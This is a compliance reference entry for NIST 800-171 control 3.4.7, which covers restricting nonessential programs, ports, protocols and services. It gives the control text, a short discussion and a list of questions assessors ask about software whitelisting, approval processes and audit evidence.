3.4.7—Configuration Management - Derived
Derived Requirement
>Control Description
Restrict, disable, or prevent the use of nonessential programs, functions, ports, protocols, and services.
>Discussion
Restricting the use of nonessential software (programs) includes restricting the roles allowed to approve program execution; prohibiting auto-execute; program blacklisting and whitelisting; or restricting the number of program instances executed at the same time. The organization makes a security-based determination which functions, ports, protocols, and/or services are restricted. Bluetooth, File Transfer Protocol (FTP), and peer-to-peer networking are examples of protocols organizations consider preventing the use of, restricting, or disabling.
>Cross-Framework Mappings
>Assessment Interview Topics
Questions assessors commonly ask
Process & Governance:
- •What policies govern software usage and installation restrictions?
- •What approval process exists for software installation?
- •How do you maintain lists of authorized software?
- •Who has authority to approve or deny software requests?
- •What procedures address unauthorized software discovery?
Technical Implementation:
- •What application control technologies restrict software installation?
- •How do you enforce whitelisting or blacklisting of applications?
- •What mechanisms prevent users from installing unauthorized software?
- •How do you detect and remove unauthorized applications?
- •What endpoint protection enforces software restrictions?
Evidence & Documentation:
- •Can you provide authorized software lists (whitelist)?
- •What application control policies and configurations exist?
- •Can you show blocked unauthorized software installation attempts?
- •What scan results identify unauthorized software?
- •What audit reports verify software restriction enforcement?
Ask AI
Configure your API key to use AI features.